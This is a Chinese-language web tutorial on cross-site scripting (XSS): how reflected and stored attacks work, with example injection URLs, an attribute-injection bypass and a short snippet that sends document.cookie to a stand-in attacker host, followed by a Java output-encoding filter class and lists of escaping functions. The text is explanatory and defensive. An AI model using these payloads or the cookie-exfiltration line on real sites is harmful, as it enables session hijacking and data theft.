概述

XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器

执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列

表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实

施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨

大的,是web安全的头号大敌。

攻击的条件

实施XSS攻击需要具备两个条件:

一、需要向web页面注入恶意代码;

二、这些恶意代码能够被浏览器成功的执行。

看一下下面这个例子:



<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"

        code="var a = document.createElement('a');

        a.innerHTML= '执行了恶意代码';document.body.appendChild(a);

        //这这里执行代码

        "></div>

相信很多程序员都觉得这个代码很正常,其实这个代码就存在一个反射型的XSS攻击,假如输入下面的地址:

http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="

最终反射出来的HTML代码:

    <div>

    <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />

    </div>

也许您会觉得把ValidateRequest设置为true或者保持默认值就能高枕无忧了,其实这种情况还可以输入下面的地址达到相同的攻击效果:

http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="

根据XSS攻击的效果可以分为几种类型

第一、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

第二、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。

XSS攻击能做些什么

1.窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:



var i=document.createElement("img");

document.body.appendChild(i);

i.src = "http://www.hackerserver.com/?c=" + document.cookie

2.读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等,如代码:

解决方法

一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码

import java.net.URLEncoder;

/**

 * 过滤非法字符工具类

 *

 */

public class EncodeFilter {

    //过滤大部分html字符

    public static String encode(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            switch (ch) {

                case '&': sb.append("&amp;");

                    break;

                case '<': sb.append("&lt;");

                    break;

                case '>': sb.append("&gt;");

                    break;

                case '"': sb.append("&quot;");

                    break;

                case '\'': sb.append("'");

                    break;

                case '/': sb.append("/");

                    break;

                default: sb.append(ch);

            }

        }

        return sb.toString();

    }

    //js端过滤

    public static String encodeForJS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // do not encode alphanumeric characters and ',' '.' '_'

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9' ||

                    ch == ',' || ch == '.' || ch == '_') {

                sb.append(ch);

            } else {

                String temp = Integer.toHexString(ch);

                // encode up to 256 with \\xHH

                if (ch < 256) {

                    sb.append('\\').append('x');

                    if (temp.length() == 1) {

                        sb.append('0');

                    }

                    sb.append(temp.toLowerCase());

                // otherwise encode with \\uHHHH

                } else {

                    sb.append('\\').append('u');

                    for (int j = 0, d = 4 - temp.length(); j < d; j ++) {

                        sb.append('0');

                    }

                    sb.append(temp.toUpperCase());

                }

            }

        }

        return sb.toString();

    }

    /**

     * css非法字符过滤

     * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters

    */

    public static String encodeForCSS(String input) {

        if (input == null) {

            return input;

        }

        StringBuilder sb = new StringBuilder(input.length());

        for (int i = 0, c = input.length(); i < c; i++) {

            char ch = input.charAt(i);

            // check for alphanumeric characters

            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                    ch >= '0' && ch <= '9') {

                sb.append(ch);

            } else {

                // return the hex and end in whitespace to terminate

                sb.append('\\').append(Integer.toHexString(ch)).append(' ');

            }

        }

        return sb.toString();

    }

    /**

     * URL参数编码

     * http://en.wikipedia.org/wiki/Percent-encoding

     */

    public static String encodeURIComponent(String input) {

        return encodeURIComponent(input, "utf-8");

    }

    public static String encodeURIComponent(String input, String encoding) {

        if (input == null) {

            return input;

        }

        String result;

        try {

            result = URLEncoder.encode(input, encoding);

        } catch (Exception e) {

            result = "";

        }

        return result;

    }

    public static boolean isValidURL(String input) {

        if (input == null || input.length() < 8) {

            return false;

        }

        char ch0 = input.charAt(0);

        if (ch0 == 'h') {

            if (input.charAt(1) == 't' &&

                input.charAt(2) == 't' &&

                input.charAt(3) == 'p') {

                char ch4 = input.charAt(4);

                if (ch4 == ':') {

                    if (input.charAt(5) == '/' &&

                        input.charAt(6) == '/') {

                        return isValidURLChar(input, 7);

                    } else {

                        return false;

                    }

                } else if (ch4 == 's') {

                    if (input.charAt(5) == ':' &&

                        input.charAt(6) == '/' &&

                        input.charAt(7) == '/') {

                        return isValidURLChar(input, 8);

                    } else {

                        return false;

                    }

                } else {

                    return false;

                }

            } else {

                return false;

            }

        } else if (ch0 == 'f') {

            if( input.charAt(1) == 't' &&

                input.charAt(2) == 'p' &&

                input.charAt(3) == ':' &&

                input.charAt(4) == '/' &&

                input.charAt(5) == '/') {

                return isValidURLChar(input, 6);

            } else {

                return false;

            }

        }

        return false;

    }

    static boolean isValidURLChar(String url, int start) {

        for (int i = start, c = url.length(); i < c; i ++) {

            char ch = url.charAt(i);

            if (ch == '"' || ch == '\'') {

                return false;

            }

        }

        return true;

    }

}

二、 过滤用户输入的 检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。、严格控制输出

可以利用下面这些函数对出现xss漏洞的参数进行过滤

1、htmlspecialchars() 函数,用于转义处理在页面上显示的文本。

2、htmlentities() 函数,用于转义处理在页面上显示的文本。

3、strip_tags() 函数,过滤掉输入、输出里面的恶意标签。

4、header() 函数,使用header("Content-type:application/json"); 用于控制 json 数据的头部,不用于浏览。

5、urlencode() 函数,用于输出处理字符型参数带入页面链接中。

6、intval() 函数用于处理数值型参数输出页面中。

7、自定义函数,在大多情况下,要使用一些常用的 html 标签,以美化页面显示,如留言、小纸条。那么在这样的情况下,要采用白名单的方法使用合法的标签显示,过滤掉非法的字符。

各语言示例:

  PHP的htmlentities()或是htmlspecialchars()。

   Python的cgi.escape()。

   ASP的Server.HTMLEncode()。

   ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library

   Java的xssprotect(Open Source Library)。

   Node.js的node-validator。

XSS攻击原理及防御措施的更多相关文章

  1. PHP 安全三板斧:过滤、验证和转义之转义篇 & Blade模板引擎避免XSS攻击原理探究

    PHP 转义 实现 把输出渲染成网页或API响应时,一定要转义输出,这也是一种防护措施,能避免渲染恶意代码,造成XSS攻击,还能防止应用的用户无意中执行恶意代码. 我们可以使用前面提到的 htmlen ...

  2. XSS攻击原理、示例和防范措施

    XSS攻击 XSS(Cross-Site Scripting,跨站脚本)攻击历史悠久,是危害范围非常广的攻击方式. Cross-Site Stripting的缩写本应该是CSS,但是为了避免和Casc ...

  3. Web前端攻击方式及防御措施

    一.XSS [Cross Site Script]跨站脚本攻击 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户 ...

  4. 简单了解:Web前端攻击方式及防御措施

    一.XSS [Cross Site Script]跨站脚本攻击  恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用 ...

  5. CSRF 攻击原理和防御方法

    1. CSRF攻击原理 CSRF(Cross site request forgery),即跨站请求伪造.我们知道XSS是跨站脚本攻击,就是在用户的浏览器中执行攻击者的脚本,来获得其cookie等信息 ...

  6. CSRF攻击原理及防御

    一.CSRF攻击原理 CSRF是什么呢?CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性.想要深入理解CSRF的攻击特性我们有必要 ...

  7. 不可不知 DDoS的攻击原理与防御方法

    DoS攻击.DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service ...

  8. 浅谈JavaScript DDOS 攻击原理与防御

    前言 DDoS(又名"分布式拒绝服务")攻击历史由来已久,但却被黑客广泛应用.我们可以这样定义典型的DDoS攻击:攻击者指使大量主机向服务器发送数据,直到超出处理能力进而无暇处理正 ...

  9. web安全之XSS攻击原理及防范

    阅读目录 一:什么是XSS攻击? 二:反射型XSS 三:存储型XSS 四:DOM-based型XSS 五:SQL注入 六:XSS如何防范? 1. cookie安全策略 2. X-XSS-Protect ...

随机推荐

  1. 【20171026早】alert(1) to win - 第六、七、八题

    早上7点起床,又写了一篇小说发在了起点网上,有兴趣的可以看看.点击这里 忙完后,继续练习,刚开始发现自己答题的速度有些慢,可能是因为对于html,javascript知识不是很精通,但是话又说回来,谁 ...

  2. 初识.Net IL

    1.IL基本资料 1.IL概述 IL是.NET框架中中间语言(Intermediate Language)的缩写.使用.NET框架提供的编译器可以直接将源程序编译为.exe或.dll文件,但此时编译出 ...

  3. 笔记-windbg及时调试

    当程序在测试或者老化的时候很有用,只要程序有异常抛出,就能启用windbg调试,这样就能及时的保存现场. 程序崩溃时,windows系统会调用系统默认调试器,其设置在注册表 HKEY_LOCAL_MA ...

  4. Java中的的画正三角方法

    在循环的语句的练习中,画正三角是一个很经典的例子,但是如果方法找的不对的话,即使最终画出来了,那么得到的代码也是非常的复杂,应用性不高. 下面有两种方法来画正三角,第一种是一种比较麻烦的办法,是通过归 ...

  5. MQTT——编写连接报文

    笔者在上一章对连接报文进行了相关的讲解.这一章笔者想写一个连接报文的例子来加深理解.本来这一章也应该在上一章出现的.可是笔者怕太长了.不好方便阅.所以决定分俩章来.正如笔者上一章所讲的.笔者会用Net ...

  6. HDU1005 Number Sequence (奇技淫巧模拟)

    A number sequence is defined as follows: f(1) = 1, f(2) = 1, f(n) = (A * f(n - 1) + B * f(n - 2)) mo ...

  7. Linux学习(十六)VIM

    一.简介 VIM是vi的增强版.VIM是Linux平台上的主要编辑器.基本上所有的文档的新增,修改,保存都需要用到它.所以,掌握VIM是很有必要的. vim的安装非常简单,一条命令就可以了: yum ...

  8. js 作用域,作用域链,闭包

    什么是作用域? 作用域是一种规则,在代码编译阶段就确定了,规定了变量与函数的可被访问的范围.全局变量拥有全局作用域,局部变量则拥有局部作用域. js是一种没有块级作用域的语言(包括if.for等语句的 ...

  9. Python爬虫入门:Urllib库的高级使用

    1.设置Headers 有些网站不会同意程序直接用上面的方式进行访问,如果识别有问题,那么站点根本不会响应,所以为了完全模拟浏览器的工作,我们需要设置一些Headers 的属性. 首先,打开我们的浏览 ...

  10. python3 re正则匹配数据获取案例

    # coding=utf-8import requestsimport jsonfrom retrying import retryimport re class TyY: def __init__( ...